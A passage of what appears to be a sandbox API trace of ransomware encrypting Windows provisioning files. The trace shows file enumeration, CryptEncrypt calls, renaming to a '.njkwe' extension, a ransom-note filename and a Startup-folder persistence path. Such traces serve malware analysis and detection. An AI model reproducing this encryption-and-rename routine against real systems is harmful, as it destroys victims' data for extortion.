hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1d9, lpOverlapped=0x0) returned 1 [0081.194] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.194] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1d9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1d9, lpOverlapped=0x0) returned 1 [0081.194] GetProcessHeap () returned 0xbe0000 [0081.194] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.194] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.194] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.195] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.195] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.195] CloseHandle (hObject=0x43c) returned 1 [0081.195] GetProcessHeap () returned 0xbe0000 [0081.195] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.195] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0081.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\489__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\489__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.196] GetProcessHeap () returned 0xbe0000 [0081.196] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.196] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9026e179, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9026e179, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9026e179, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", cAlternateFileName="48__CO~1.PRO")) returned 1 [0081.196] lstrcmpiW (lpString1="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.196] lstrcmpiW (lpString1="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.196] lstrcmpiW (lpString1="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.196] lstrcmpiW (lpString1="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.196] lstrcmpiW (lpString1="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.196] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml") returned 161 [0081.197] StrStrIW (lpFirst="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.197] lstrcmpW (lpString1="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.197] lstrcmpW (lpString1="48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.197] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\48__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.197] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\48__connections_cellular_proximus (belgium)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.197] GetTickCount () returned 0x11549c7 [0081.197] GetTickCount () returned 0x11549c7 [0081.197] GetTickCount () returned 0x11549c7 [0081.197] GetTickCount () returned 0x11549c7 [0081.197] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.197] GetProcessHeap () returned 0xbe0000 [0081.197] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.197] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0081.199] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.199] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0081.199] GetProcessHeap () returned 0xbe0000 [0081.199] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.199] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.199] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.199] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.199] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.199] CloseHandle (hObject=0x43c) returned 1 [0081.199] GetProcessHeap () returned 0xbe0000 [0081.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.199] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0081.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\48__connections_cellular_proximus (belgium)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\48__Connections_Cellular_Proximus (Belgium)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\48__connections_cellular_proximus (belgium)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.200] GetProcessHeap () returned 0xbe0000 [0081.200] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.200] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911a1852, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911a1852, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911a1852, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x29f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="490__C~1.PRO")) returned 1 [0081.200] lstrcmpiW (lpString1="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.200] lstrcmpiW (lpString1="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.200] lstrcmpiW (lpString1="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.200] lstrcmpiW (lpString1="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.200] lstrcmpiW (lpString1="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.200] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml") returned 184 [0081.201] StrStrIW (lpFirst="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.201] lstrcmpW (lpString1="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.201] lstrcmpW (lpString1="490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.201] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\490__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\490__connections_cellular_cincinnati bell wireless (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.201] GetTickCount () returned 0x11549c7 [0081.201] GetTickCount () returned 0x11549c7 [0081.201] GetTickCount () returned 0x11549c7 [0081.201] GetTickCount () returned 0x11549c7 [0081.201] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.201] GetProcessHeap () returned 0xbe0000 [0081.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.201] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x29f, lpOverlapped=0x0) returned 1 [0081.241] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.241] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x29f, lpOverlapped=0x0) returned 1 [0081.241] GetProcessHeap () returned 0xbe0000 [0081.241] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.241] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.241] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.242] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.242] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.242] CloseHandle (hObject=0x43c) returned 1 [0081.242] GetProcessHeap () returned 0xbe0000 [0081.242] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.242] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 204 [0081.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\490__connections_cellular_cincinnati bell wireless (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\490__Connections_Cellular_Cincinnati Bell Wireless (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\490__connections_cellular_cincinnati bell wireless (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.243] GetProcessHeap () returned 0xbe0000 [0081.243] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.243] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911a1852, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911a1852, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911a1852, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x294, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="491__C~1.PRO")) returned 1 [0081.243] lstrcmpiW (lpString1="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.243] lstrcmpiW (lpString1="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.243] lstrcmpiW (lpString1="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.243] lstrcmpiW (lpString1="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.243] lstrcmpiW (lpString1="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.243] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml") returned 176 [0081.243] StrStrIW (lpFirst="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.243] lstrcmpW (lpString1="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.243] lstrcmpW (lpString1="491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.243] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\491__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.243] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\491__connections_cellular_plateau wireless (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.244] GetTickCount () returned 0x11549f6 [0081.244] GetTickCount () returned 0x11549f6 [0081.244] GetTickCount () returned 0x11549f6 [0081.244] GetTickCount () returned 0x11549f6 [0081.244] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.244] GetProcessHeap () returned 0xbe0000 [0081.244] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.244] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0081.246] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.246] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0081.246] GetProcessHeap () returned 0xbe0000 [0081.246] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.246] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.246] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.246] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.246] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.246] CloseHandle (hObject=0x43c) returned 1 [0081.246] GetProcessHeap () returned 0xbe0000 [0081.246] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.246] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 196 [0081.246] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\491__connections_cellular_plateau wireless (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\491__Connections_Cellular_Plateau Wireless (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\491__connections_cellular_plateau wireless (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.247] GetProcessHeap () returned 0xbe0000 [0081.247] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.247] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911a1852, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911a1852, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911a1852, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2a2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="492__C~1.PRO")) returned 1 [0081.247] lstrcmpiW (lpString1="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.247] lstrcmpiW (lpString1="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.247] lstrcmpiW (lpString1="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.247] lstrcmpiW (lpString1="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.247] lstrcmpiW (lpString1="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.247] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml") returned 186 [0081.247] StrStrIW (lpFirst="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.247] lstrcmpW (lpString1="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.247] lstrcmpW (lpString1="492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.247] StrCmpNW 